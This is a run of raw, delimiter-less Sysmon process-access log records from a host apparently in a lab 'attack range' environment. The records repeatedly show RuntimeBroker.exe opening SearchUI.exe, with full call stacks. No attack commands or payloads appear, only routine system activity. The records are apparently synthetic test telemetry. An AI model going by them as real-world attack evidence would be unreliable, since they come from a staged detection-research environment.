13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.607{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 